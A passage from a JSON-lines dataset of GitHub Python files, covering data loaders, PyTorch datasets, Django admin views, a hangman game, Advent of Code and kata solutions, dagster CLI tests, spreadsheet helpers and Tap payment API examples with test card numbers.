print(train_data.describe())\n print(train_data.head())\n plt.plot(train_data['Date'], train_data['ConfirmedCases'])\n plt.show()\n cases_data = train_data[\"ConfirmedCases\"]\n data_set = univariate_data(cases_data, 0, None, 5, 0)\n print(data_set)\n","repo_name":"james20140802/COVID-19","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41819322357","text":"import copy\nfrom scipy.special import softmax\nclass Neighbours:\n\n\n def __init__(self):\n self.central = None\n self.cardinal = []\n self.ordinal = []\n\n def getstatenotopography(self):\n state = 0\n if self.central is not None:\n state += self.central.state\n if len(self.cardinal) > 0:\n state += sum(map(lambda _: _.state, self.cardinal))\n if len(self.ordinal) > 0:\n state += sum(map(lambda _: 0.83 * _.state, self.ordinal))\n return state\n\n def getstate(self):\n state = 0\n if self.central is not None:\n state += self.central.state\n if len(self.cardinal) > 0:\n state += sum(map(lambda _: _.state * (((self.central.elevation - _.elevation) / self.sum() if self.sum() > 0 else 1)), self.cardinal))\n if len(self.ordinal) > 0:\n state += sum(map(lambda _: 0.83 * _.state * (((self.central.elevation - _.elevation) / self.sum() if self.sum() > 0 else 1)), self.ordinal))\n return state\n\n\n def getall(self):\n all = []\n all.extend(copy.deepcopy(self.cardinal))\n all.extend(copy.deepcopy(self.ordinal))\n return all\n\n def sum(self):\n all = copy.deepcopy(self.getall())\n all.append(self.central)\n return sum(_.elevation for _ in all)\n\n","repo_name":"JakubMol/bps","sub_path":"Source/pythonProject-20210320T135709Z-001/pythonProject/Neighbours.py","file_name":"Neighbours.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72143147049","text":"\"\"\"\nJacob Padgett\nW09 Prove\nBro Brian Wilson\n\"\"\"\nimport time\n\n\n# Use the lists because the asignment calls for it...\n# even though a dictionary would be a better choice.\nitems = []\nprices = []\n\n# Other variables\nd = \"-\" * 25\npair = \"Price\\tItem\"\nclear = chr(27) + \"[2J\" # clear the terminal\n\nprompt_user = \"\"\"\nWhat would you like to do: (enter the number)\n\n1 - Add a new item\n2 - Display the contents of the shopping cart\n3 - Remove an item (only needed for the final project deliverable)\n4 - Compute the total (only needed for the final project deliverable)\n\n5 - Quit\\n\n\"\"\"\n\nprint(clear)\n\nresponse = None\n\nwhile response != 5:\n\n response = int(input(prompt_user))\n\n # Add a new item\n if response == 1:\n print(clear)\n x = input(\"What is the new item you'd like to add? \")\n time.sleep(0.25)\n y = float(input(f\"What is the price/cost of the {x}: \"))\n print(f\"{clear}Adding {x.upper()} to your cart\\n...Please wait...\")\n time.sleep(1.25)\n items.append(x.title())\n prices.append(y)\n print(clear)\n\n # Display the contents of the shopping cart\n elif response == 2:\n print(clear)\n print(pair)\n print(d)\n\n for price, item in zip(prices, items):\n print(f\"{price:.2f}\\t{item}\")\n\n input(\"\\n\\nPress Enter to continue...\")\n\n # Remove an item\n elif response == 3:\n print(clear)\n print(pair)\n print(d)\n\n # display initial cart before item is removed\n for price, item in zip(prices, items):\n print(f\"{price:.2f}\\t{item}\")\n\n # remove item and price\n delete_item = input(\n \"\\nType the name of the item would you like to remove? \"\n ).title()\n\n print(clear)\n print(\"Deleting item\\n...Please wait...\")\n time.sleep(1.5)\n print(clear)\n\n # get the index number for item to be deleted\n idx_num = items.index(delete_item)\n\n items.pop(idx_num)\n prices.pop(idx_num)\n\n # display updated cart\n print(pair)\n print(d)\n for price, item in zip(prices, items):\n print(f\"{price:.2f}\\t{item}\")\n\n input(\"\\n\\nPress Enter to continue...\")\n print(clear)\n\n # Compute the total\n elif response == 4:\n print(clear)\n\n # display cart\n print(pair)\n print(d)\n for price, item in zip(prices, items):\n print(f\"{price:.2f}\\t{item}\")\n\n print(f\"\\nYour total cart value is ${sum(prices):.2f}\")\n\n input(\"\\n\\nPress Enter to continue...\")\n print(clear)\n\nprint(clear)\nprint(\"\\nThanks for using the cart!\\n\")\n","repo_name":"jacobpad/BYUI_CS101","sub_path":"week_09/prove.py","file_name":"prove.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13771370246","text":"import csv\ntry:\n with open(r\"/Users/suratsetthanan/Documents/python/08/fine.csv\",\"w+\", newline=\"\") as fine:\n csvfine = csv.writer(fine)\n csvfine.writerow([\"Apple\",\"Mango\",\"Watermelon\"])\n csvfine.writerow([\"Banana\",\"Lime\",\"Orange\"])\nexcept (FileExistsError, FileNotFoundError):\n print(\"ไฟล์ถูกสร้างแล้ว หรือ ไม่พบตำแหน่ที่ระบุ\")\nelse:\n print(\"เขียนไฟล์สำเร็จ\")","repo_name":"surut555/Python","sub_path":"08/fine_csv.py","file_name":"fine_csv.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16326953592","text":"\"\"\"\nDefine dataset and transforms\n\"\"\"\n\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms\nimport glob\nimport os\nimport numpy as np\nimport torch\nfrom skimage.transform import resize\n\n\ndef set_transform(resize=256):\n transform = transforms.Compose([\n transforms.Resize((resize,resize)),\n transforms.ToTensor()\n ])\n\n return transform\n\n\nclass simpleDataset(Dataset):\n def __init__(self, folder, max_files=None, inputs=['vis'], include_stoppage=False, transform=None, resize_dim=256):\n self.folder = folder\n self.paths = glob.glob(os.path.join(folder,'*.npz'))\n self.transform = transform\n self.resize_dim = resize_dim\n self.inputs = inputs\n\n # ignore files that has 'stop' in filename if include_stoppage == False\n if not include_stoppage:\n self.paths = [f for f in self.paths if 'stop' not in f]\n\n\n if max_files and len(self.paths)>max_files:\n self.paths = self.paths[:max_files]\n\n def __len__(self) -> int:\n return len(self.paths)\n\n def __getitem__(self, index: int):\n filepath = self.paths[index]\n saved = np.load(filepath)\n saved = dict(zip((key for key in saved.keys()), (saved[key] for key in saved.keys())))\n saved['vis'] = (saved['psi']>0)*1.0\n\n X = np.stack([resize(saved[name],(self.resize_dim,self.resize_dim),order=0) for name in self.inputs],0)\n X = torch.Tensor(X)\n #X = torch.Tensor(resize((saved['psi']>0)*1.0,(self.resize_dim,self.resize_dim),order=0))\n Y = torch.Tensor(resize((saved['phi']>0)*1.0,(self.resize_dim,self.resize_dim),order=0)).unsqueeze(0)\n\n\n if self.transform:\n X = self.transform(X)\n Y = self.transform(Y)\n\n return X, Y\n\n\nclass CustomDataset(Dataset):\n \"\"\"A custom dataset for loading 2D visibility data\"\"\"\n \n def __init__(self, data_dir, max_files, transform=None, gain_threshold=0, include_stoppage=False):\n \"\"\"\n Initialize the dataset object\n \n :param data_dir: data directory \n :param max_files: maximum number of data files to load \n :param transform: optional transform to be applied on a sample \n :param gain_threshold: threshold on the maximum gain of a sample \n :param include_stoppage: whether or not to include stoppage samples \n \"\"\"\n \n # load files from data directory \n self.data_dir = data_dir\n self.files = os.listdir(self.data_dir)[:max_files]\n self.files.sort()\n \n # ignore files that has 'stop' in filename if include_stoppage == False\n if not include_stoppage:\n self.files = [f for f in self.files if 'stop' not in f]\n \n # filter out samples whose maximum gain value is below gain_threshold \n if gain_threshold > 0:\n self.files = [f for f in self.files \n if np.load(os.path.join(self.data_dir, f))['E'].max() >= gain_threshold]\n \n # assign IDs to samples \n self.IDs = np.arange(len(self.files))\n \n # transform to be applied on a sample \n self.transform = transform\n \n \n def __len__(self):\n \"\"\"Return the number of samples in the dataset\"\"\"\n \n return len(self.files)\n \n def __getitem__(self, idx):\n \"\"\"Load and return a sample from the dataset at the given index idx\"\"\"\n \n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n # load sample \n filename = self.files[idx]\n saved = np.load(os.path.join(self.data_dir, filename))\n \n ID = self.IDs[idx] # sample ID\n psi = saved['psi'] # cumulative visibility\n phi = saved['phi'] # scene\n horizons = saved['horizons'] # frontier\n E = saved['E'] # gain function \n \n # convert continuous to discrete \n vis = 1.0*(psi>0)\n scene = 1.0*(phi>0)\n \n # form sample \n sample = {'ID': ID, 'vis': vis, 'scene': scene, 'frontier': horizons, 'gain': E, 'max_gain': E.max()}\n \n # transform sample \n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\n \nclass ApplyTransform(Dataset):\n \"\"\"Apply transformations to a Dataset\"\"\"\n \n def __init__(self, dataset, transform=None):\n \"\"\"\n Initialize the dataset object \n \n :param dataset: (Dataset) a Dataset that returns samples\n :param transform: (callable, optional) a function/transform to be applied on the sample\n \"\"\"\n \n self.dataset = dataset\n self.transform = transform\n\n def __getitem__(self, idx):\n \"\"\"Load and return a sample from the dataset at the given index idx\"\"\"\n \n sample = self.dataset[idx]\n if self.transform is not None:\n sample = self.transform(sample)\n return sample\n\n def __len__(self):\n \"\"\"Return the number of samples in the dataset\"\"\"\n \n return len(self.dataset)\n \n \nclass ScaleGain(object):\n \"\"\"Scale the gain function of a sample by either taking square root or dividing by maximum\"\"\"\n \n def __init__(self, mode):\n self.mode = mode\n \n def __call__(self, sample):\n \n if self.mode == 'none':\n pass\n elif self.mode == 'sqrt':\n sample['gain'] = np.sqrt(sample['gain'])\n elif self.mode == 'div_by_max':\n if sample['max_gain'] != 0:\n sample['gain'] /= sample['max_gain']\n else:\n raise ValueError\n \n return sample\n\n \nclass SelectInputsLabel(object):\n \"\"\"Select inputs to the network\"\"\"\n \n def __init__(self, input_names, label_name):\n self.input_names = input_names\n self.label_name = label_name\n \n def __call__(self, sample):\n\n return {'ID': sample['ID'],\n 'image': np.stack([sample[name] for name in self.input_names], 0),\n 'label': sample[self.label_name],\n 'max_gain': sample['max_gain']}\n\n \nclass ToTensor(object):\n \"\"\"Convert ndarrays of a sample to tensors\"\"\"\n \n def __call__(self, sample):\n \n for key in sample.keys():\n sample[key] = torch.tensor(sample[key])\n \n return sample\n \n","repo_name":"c76068/GAN-shape-completion","sub_path":"datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74176053287","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 1 22:56:38 2019\n\n@author: alkesha\n\"\"\"\n# import the necessary packages\nfrom imutils.video import VideoStream\nimport cv2\n\ntracker =cv2.TrackerCSRT_create()\n \nbounding_box = None\nvideo = VideoStream(0).start()\n\nwhile True:\n frame = video.read()\n frame=frame\n if frame is None:\n break \n (h, w) = frame.shape[:2]\n if bounding_box is not None:\n (t, box) = tracker.update(frame)\n \n if t:\n (x, y, w, h) = [int(v) for v in box]\n cv2.rectangle(frame, (x, y), (x + w, y + h),(0, 111, 0), 3)\n \n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1)\n\n if key == ord(\"c\"):\n bounding_box = cv2.selectROI(\"Frame\", frame, fromCenter=False,\n )\n tracker.init(frame,bounding_box)\n \n elif key == ord(\"q\"):\n break\n\nelse:\n\tvideo.release()\ncv2.destroyAllWindows()\n","repo_name":"freesoul84/100DaysOfMLcode","sub_path":"object_tracking/object_tracker.py","file_name":"object_tracker.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"11342577372","text":"from django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom listArch.Forms.CategoryForm import CategoryForm\nfrom listArch.models.Category import Category\nfrom listArch.models.CategoryDesc import CategoryDesc\nfrom listArch.services import general_methods\nfrom listArch.services.general_methods import category_parent_show\n\n\ndef add_category(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n categories = Category.objects.filter(isActive=True).filter(is_parent=True)\n category_form = CategoryForm()\n try:\n if request.method == 'POST':\n category_form = CategoryForm(request.POST)\n if category_form.is_valid():\n\n category_tr = request.POST['category_description[tr][name]']\n category_eng = request.POST['category_description[eng][name]']\n\n category = Category(name=category_tr, isActive=category_form.cleaned_data['isActive'],\n isBasic=category_form.cleaned_data['isBasic'],\n order=category_form.cleaned_data['order'], icon=request.FILES['icon'],\n is_click=category_form.cleaned_data['is_click'])\n category.save()\n category.slug_save()\n\n if request.POST['category_parent'] == \"\":\n category.is_parent = True\n category.save()\n else:\n category.parent = Category.objects.get(pk=request.POST['category_parent'])\n category.save()\n\n content_tr = request.POST['content[tr]']\n content_eng = request.POST['content[eng]']\n\n category_desc = CategoryDesc(category=category, description=category_eng, lang_code=2,\n definition=content_eng, page_description=request.POST['description[eng]'])\n category_desc.save()\n\n category_desc2 = CategoryDesc(category=category, description=category_tr, lang_code=1,\n definition=content_tr, page_description=request.POST['description[tr]'])\n category_desc2.save()\n\n messages.success(request, \"Kategori Başarıyla eklendi.\")\n return redirect('listArch:kategori-ekle')\n else:\n messages.warning(request, \"Alanları Kontrol Edin.\")\n except Exception as e:\n print(e)\n messages.warning(request, '')\n\n return render(request, 'category/add-category.html', {'categories': categories, 'category_form': category_form})\n\n\ndef return_categories(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n cat_array = []\n try:\n categories = CategoryDesc.objects.filter(category__isActive=True).filter(lang_code=1).order_by('category__name')\n\n for category in categories:\n cat_dict = dict()\n parent_cat = category_parent_show(category.category)\n cat_dict['category_name'] = parent_cat\n cat_dict['category'] = category.category\n cat_array.append(cat_dict)\n except Exception as e:\n print(e)\n return redirect('listArch:admin-error-sayfasi')\n return render(request, 'category/category-list.html', {'categories': cat_array})\n\n\ndef update_category(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n category = Category.objects.get(pk=pk)\n categories = Category.objects.all()\n category_parent = \"\"\n category_desc1 = \"\"\n category_desc2 = \"\"\n\n cat_array = []\n category_form = CategoryForm(request.POST or None, request.FILES or None, instance=category)\n\n try:\n if category.parent:\n category_parent = category.parent.name\n else:\n category_parent = \"\"\n category_desc1 = CategoryDesc.objects.filter(category=category).filter(lang_code=1)\n category_desc2 = CategoryDesc.objects.filter(category=category).filter(lang_code=2)\n\n for cat in categories:\n cat_dict = dict()\n parent_cat = category_parent_show(cat)\n parent = parent_cat.split(' > ')\n if parent.__len__() == 2:\n cat_dict['category_name'] = parent[0]\n elif parent.__len__() == 3:\n cat_dict['category_name'] = parent[1]\n elif parent.__len__() == 4:\n cat_dict['category_name'] = parent[2]\n\n cat_dict['category'] = cat\n cat_array.append(cat_dict)\n\n if request.method == 'POST':\n if category_form.is_valid():\n\n category_eng = request.POST['category_description[eng][name]']\n category_tr = request.POST['category_description[tr][name]']\n\n category.isActive = category_form.cleaned_data['isActive']\n category.isBasic = category_form.cleaned_data['isBasic']\n category.order = category_form.cleaned_data['order']\n category.icon = category_form.cleaned_data['icon']\n category.name = category_tr\n category.is_click = category_form.cleaned_data['is_click']\n\n category.save()\n\n # TR\n for category_desc_tr in category_desc1:\n category_desc_tr.description = category_tr\n category_desc_tr.definition = request.POST['content[tr]']\n category_desc_tr.page_description = request.POST['description[tr]']\n category_desc_tr.save()\n\n # ENG\n for category_desc_eng in category_desc2:\n category_desc_eng.description = category_eng\n category_desc_eng.definition = request.POST['content[eng]']\n category_desc_eng.page_description = request.POST['description[eng]']\n category_desc_eng.save()\n\n if category.isBasic:\n category.parent = None\n category.is_parent = True\n category.icon = category_form.cleaned_data['icon']\n category.save()\n else:\n category.parent = Category.objects.get(pk=request.POST['category_parent'])\n category.save()\n\n messages.success(request, \"Kategori Başarıyla Düzenlendi.\")\n return redirect('listArch:kategori-listesi')\n else:\n messages.success(request, \"Alanları Kontrol Edin.\")\n except Exception as e:\n print(e)\n return redirect('listArch:admin-error-sayfasi')\n\n return render(request, 'category/category-update.html',\n {'parent': category_parent, 'category_tr': category_desc1[0],\n 'category_eng': category_desc2[0],\n 'categories': cat_array, 'category': category, 'category_form': category_form})\n\n\ndef delete_category(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n if request.method=='POST':\n try:\n\n category_id = request.POST['category_id']\n category = Category.objects.get(pk=category_id)\n category_parent = Category.objects.filter(isActive=True).filter(parent=category)\n if category_parent.count() == 0:\n category.isActive = False\n category.save()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n else:\n return JsonResponse({'status': 'Error', 'messages': 'Üst Kategori Silinemez !! '})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n","repo_name":"furkanyalcindag/oxit-listingArch","sub_path":"listArch/Views/CategoryViews.py","file_name":"CategoryViews.py","file_ext":"py","file_size_in_byte":8098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37753928117","text":"def wave(string):\n lista = []\n if string == None:\n return []\n else:\n lenght = len(string)\n for count, i in enumerate(string):\n i = string[count:count+1].upper()\n \n lista.append(i)\n return lista\n\n\nprint(wave('test'))\n","repo_name":"Akaidmaru/random_python","sub_path":"wave.py","file_name":"wave.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72280059368","text":"import re\nfrom functools import reduce\n\nrulePattern = re.compile(\"^(.+): (\\d+)-(\\d+) or (\\d+)-(\\d+)$\")\n\n\ndef getInput():\n with open(\"16.txt\") as f:\n rules, ticket, otherTickets = f.read().split(\"\\n\\n\")\n ruleDict = {}\n for r in rules.split(\"\\n\"):\n g = re.match(rulePattern, r).groups()\n ruleDict[g[0]] = set(range(int(g[1]), int(g[2])+1)\n ) | set(range(int(g[3]), int(g[4])+1))\n\n return ruleDict, ticket, otherTickets.split(\"\\n\")\n\n\ndef main():\n rules, ticket, tickets = getInput()\n nearbyTickets = list(\n map(lambda x: list(map(lambda x: int(x), x.split(\",\"))), tickets[1:]))\n allowedNums = [y for ys in rules.values() for y in ys]\n\n print(\"Part 1: {}\".format(\n sum([y for ys in nearbyTickets for y in ys if y not in allowedNums])))\n\n validTickets = list(filter(lambda y: all(\n map(lambda x: x in allowedNums, y)), nearbyTickets))\n\n # Figure out which columns can be what key(type etc)\n found = {}\n for key in rules.keys():\n for col in range(len(validTickets[0])):\n if all(map(lambda x: x in rules[key], list(map(lambda x: x[col], validTickets)))):\n if col not in found:\n found[col] = [key]\n else:\n found[col].append(key)\n\n # Go over column - values and elimitate the columns that can be only one value\n final = {}\n changed = 1\n while changed > 0:\n changed = 0\n for k, v in found.items():\n if len(v) == 1 and v[0] not in final:\n final[v[0]] = k\n changed += 1\n elif len(set(v) - set(final.keys())) == 1:\n newK = (set(v) - set(final.keys())).pop()\n if newK not in final:\n final[newK] = k\n changed += 1\n\n departureIdx = [v for k, v in final.items() if k.startswith(\"departure \")]\n ticket = list(map(lambda x: int(x), ticket.split(\"\\n\")[1].split(\",\")))\n\n print(\"Part 2: {}\".format(\n reduce(lambda a, b: a*b, [ticket[i] for i in departureIdx])))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Flourish3/AdventOfCode","sub_path":"2020/python/16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9889121847","text":"import tempfile\n\nimport pytest\nfrom click.testing import CliRunner\nfrom dagster._cli.instance import get_concurrency, set_concurrency\nfrom dagster._core.instance_for_test import instance_for_test\n\n\n@pytest.fixture(name=\"instance_runner\")\ndef mock_instance_runner():\n with tempfile.TemporaryDirectory() as dagster_home_temp:\n with instance_for_test(\n temp_dir=dagster_home_temp,\n overrides={\n \"event_log_storage\": {\n \"module\": \"dagster.utils.test\",\n \"class\": \"ConcurrencyEnabledSqliteTestEventLogStorage\",\n \"config\": {\"base_dir\": dagster_home_temp},\n }\n },\n ) as instance:\n runner = CliRunner(env={\"DAGSTER_HOME\": dagster_home_temp})\n yield instance, runner\n\n\n@pytest.fixture(name=\"unsupported_instance_runner\")\ndef mock_unsupported_instance_runner():\n with tempfile.TemporaryDirectory() as dagster_home_temp:\n with instance_for_test(temp_dir=dagster_home_temp) as instance:\n runner = CliRunner(env={\"DAGSTER_HOME\": dagster_home_temp})\n yield instance, runner\n\n\ndef test_get_concurrency(instance_runner):\n instance, runner = instance_runner\n result = runner.invoke(get_concurrency)\n assert result.exit_code == 1\n assert \"Must either specify a key argument or\" in result.output\n\n result = runner.invoke(get_concurrency, [\"--all\"])\n assert result.exit_code == 0\n assert \"No concurrency limits set.\" in result.output\n\n instance.event_log_storage.set_concurrency_slots(\"foo\", 1)\n instance.event_log_storage.set_concurrency_slots(\"bar\", 1)\n\n result = runner.invoke(get_concurrency, [\"foo\"])\n assert result.exit_code == 0\n assert \"bar\" not in result.output\n assert '\"foo\": 0 / 1 slots occupied' in result.output\n\n result = runner.invoke(get_concurrency, [\"--all\"])\n assert result.exit_code == 0\n assert '\"foo\": 0 / 1 slots occupied' in result.output\n assert '\"bar\": 0 / 1 slots occupied' in result.output\n\n\ndef test_set_concurrency(instance_runner):\n instance, runner = instance_runner\n assert instance.event_log_storage.get_concurrency_info(\"foo\").slot_count == 0\n result = runner.invoke(set_concurrency, [\"foo\", \"1\"])\n assert result.exit_code == 0\n assert \"Set concurrency limit for foo to 1\" in result.output\n\n\ndef test_unsupported(unsupported_instance_runner):\n _instance, runner = unsupported_instance_runner\n result = runner.invoke(get_concurrency)\n assert result.exit_code == 1\n assert \"does not support global concurrency limits\" in result.output\n\n result = runner.invoke(set_concurrency, [\"foo\", \"1\"])\n assert result.exit_code == 1\n assert \"does not support global concurrency limits\" in result.output\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster_tests/cli_tests/command_tests/test_concurrency_command.py","file_name":"test_concurrency_command.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"8326955503","text":"import gspread\nfrom gspread_formatting.dataframe import format_with_dataframe\nfrom gspread_formatting import DataValidationRule, BooleanCondition, set_data_validation_for_cell_range\nfrom gspread_dataframe import get_as_dataframe, set_with_dataframe\nimport orders_update\n\n\ndef set_updated_orders(time, googlesheet_name, worksheet_name, account=gspread.service_account(filename='vol/creds.json')):\n gp = account\n googlesheet = gp.open(googlesheet_name)\n worksheet = googlesheet.worksheet(worksheet_name)\n\n df = orders_update.select_current_orders(time)\n df_len = df.shape[0]\n set_with_dataframe(worksheet, df)\n add_checkboxes('H', 2, df_len)\n format_with_dataframe(worksheet, df, include_column_header=True)\n\n\ndef take_df_from_spreadsheet(googlesheet_name, worksheet_name, usecols,\n account=gspread.service_account(filename='vol/creds.json')):\n gp = account\n googlesheet = gp.open(googlesheet_name)\n worksheet = googlesheet.worksheet(worksheet_name)\n\n df = get_as_dataframe(worksheet, parse_dates=True, usecols=usecols, skiprows=1, header=None)\n\n return df\n\n\ndef add_checkboxes(column, start_val, stop_val, account=gspread.service_account(filename='vol/creds.json'),\n googlesheet_name='Orders', worksheet_name='Orders_latest'):\n service = account\n googlesheet = service.open(googlesheet_name)\n worksheet = googlesheet.worksheet(worksheet_name)\n\n validation_rule = DataValidationRule(\n BooleanCondition('BOOLEAN', ['TRUE', 'FALSE']), # condition'type' and 'values', defaulting to TRUE/FALSE\n showCustomUi=True)\n\n set_data_validation_for_cell_range(worksheet, column + f'{start_val}' + ':' + column + f'{stop_val + 1}',\n validation_rule)\n\n\ndef clear_worksheet(googlesheet_name, worksheet_name, account=gspread.service_account(filename='vol/creds.json')):\n service = account\n googlesheet = service.open(googlesheet_name)\n worksheet = googlesheet.worksheet(worksheet_name)\n\n worksheet.clear()\n\n\ndef append_row_order(row, info, account=gspread.service_account(filename='vol/creds.json')):\n \"\"\"\n\n :param row: row = [code, car_num, car_brand, Time, Time_of_arrival]\n :param info: info = (Name, Phone, Home_num)\n :param account: gspread account\n :return: adds a row to the Orders_all worksheet\n \"\"\"\n\n googlesheet = account.open('Orders')\n worksheet = googlesheet.worksheet('Orders_completed')\n\n line = [row[0], row[1], row[2], str(row[3]), info[0], info[1], info[2], row[4]]\n worksheet.append_row(line)\n","repo_name":"vanya-robot/passbot","sub_path":"spreadsheets.py","file_name":"spreadsheets.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17944940273","text":"from __future__ import print_function\nimport tap\n\n######################\n# Token Creation\n######################\n\ndata = {\n \"card\": {\n \"number\": 5123450000000008,\n \"exp_month\": 12,\n \"exp_year\": 21,\n \"cvc\": 124,\n \"name\": \"test token\",\n \"address\": {\n \"country\": \"Kuwait\",\n \"line1\": \"Salmiya, 21\",\n \"city\": \"Kuwait city\",\n \"street\": \"Salim\",\n \"avenue\": \"Gulf\"\n }\n },\n \"client_ip\": \"192.168.1.20\"\n}\n\nresp = tap.Token.create(**data)\nprint('Success: %r' % (resp))\ntoken_id = resp.id\n\n######################\n# TODO REMOVE THIS\n######################\n\ndata = {\n \"card\": {\n \"number\": 4508750015741019,\n \"exp_month\": 12,\n \"exp_year\": 21,\n \"cvc\": 124,\n \"name\": \"test token\",\n \"address\": {\n \"country\": \"Kuwait\",\n \"line1\": \"Salmiya, 21\",\n \"city\": \"Kuwait city\",\n \"street\": \"Salim\",\n \"avenue\": \"Gulf\"\n }\n },\n \"client_ip\": \"192.168.1.20\"\n}\n\nresp = tap.Token.create(**data)\nprint('Success: %r' % (resp))\nnew_card_token_id = resp.id\n\n######################\n# Customer Creation\n######################\n\ndata = {\n \"first_name\": \"test\",\n \"last_name\": \"test\",\n \"email\": \"test@test.com\",\n \"nationality\": \"Moroccan\",\n \"currency\": \"MAD\"\n}\n\nresp = tap.Customer.create(**data)\ncustomer_id = resp.id\n\n######################\n# Create Card\n######################\nresp = tap.Customer.create_card(resp.id, **{'source': token_id})\ncard_id = resp.id\n\n######################\n# retrieve Card\n######################\n\ntap.Customer.retrieve_card(customer_id, card_id)\n\n######################\n# list Card\n######################\n\ntap.Customer.list_cards(customer_id)\n\n######################\n# Create Charge\n######################\ndata = {\n \"amount\": 10,\n \"currency\": \"KWD\",\n \"customer\": {\n \"id\": customer_id\n },\n \"source\": {\n \"id\": \"src_all\"\n },\n \"post\": {\n \"url\": \"http://your_website.com/post_url\"\n },\n \"redirect\": {\n \"url\": \"http://your_website.com/redirect_url\"\n }\n}\n\nresp = tap.Charge.create(**data)\nprint('Success: %r' % (resp))\n","repo_name":"obytes/tap-python","sub_path":"examples/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20629425707","text":"\"\"\"\nFile: hangman.py\n-----------------------------\nThis program plays hangman game.\nUsers sees a dashed word, trying to\ncorrectly figure the un-dashed word out\nby inputting one character each round.\nIf the user input is correct, show the\nupdated word on console. Players have N_TURNS\nto try in order to win this game.\n\"\"\"\n\n\nimport random\n\n\n# This constant controls the number of guess the player has\nN_TURNS = 7\nALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n\n\ndef main():\n \"\"\"\n Function: Plays hangman game.\n Principle: Input letters, judge whether it is the answer,\n and make a corresponding response\n (answer correct > continue, answer incorrect > deduct blood)\n until all guesses are correct or the blood volume is zero.\n \"\"\"\n ans = random_word()\n print(hand_game(ans) + '\\nThe word was: ' + ans)\n\n\ndef hand_game(ans):\n '''\n Function: Execute until all guesses are correct or the blood volume is zero.\n :param ans: str,Answer word\n :return: str,Game result\n '''\n\n '''\n Initialization:\n hp: int,Can guess the number of wrong chances\n ans_len: int,Answer word count\n right_num: int,Number of correct words\n now_ans: str,Now answer (ex:____)\n log_guess: str,History answer\n '''\n hp = N_TURNS\n ans_len = len(ans)\n right_num = 0\n log_guess = ''\n now_ans = ''\n for i in range(ans_len):\n now_ans += '_'\n\n '''\n End conditions: \n 1. The number of guesses = number of letters. \n 2. HP returns to zero.\n '''\n while True:\n if right_num == ans_len:\n return 'You win!!'\n elif hp == 0:\n return 'You are completely hung : ('\n else:\n print('The word looks like: ' + now_ans)\n print('You have ' + str(hp) + ' guess left.')\n guess = input('Your guess: ').upper()\n\n # ALPHABET has all the letters, if there are none in it, it is abnormal.\n if ALPHABET.find(guess) == -1:\n print('')\n else:\n # log_guess has all the historical answers, if there is, it is abnormal.\n if log_guess.find(guess) != -1:\n print('')\n else:\n if ans.find(guess) == -1:\n log_guess += guess\n hp -= 1\n print('There is no ' + guess + '\\'s in the word.')\n else:\n log_guess += guess\n for i in range(ans_len):\n if ans[i] == guess:\n now_ans = now_ans[:i] + guess + now_ans[i + 1:]\n right_num += 1\n\n\ndef random_word():\n num = random.choice(range(9))\n if num == 0:\n return \"NOTORIOUS\"\n elif num == 1:\n return \"GLAMOROUS\"\n elif num == 2:\n return \"CAUTIOUS\"\n elif num == 3:\n return \"DEMOCRACY\"\n elif num == 4:\n return \"BOYCOTT\"\n elif num == 5:\n return \"ENTHUSIASTIC\"\n elif num == 6:\n return \"HOSPITALITY\"\n elif num == 7:\n return \"BUNDLE\"\n elif num == 8:\n return \"REFUND\"\n\n\n##### DO NOT EDIT THE CODE BELOW THIS LINE #####\nif __name__ == '__main__':\n main()\n","repo_name":"Tsai-nono/py-projects","sub_path":"repository/hangman_game/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42430189041","text":"\"\"\" Solver module has the 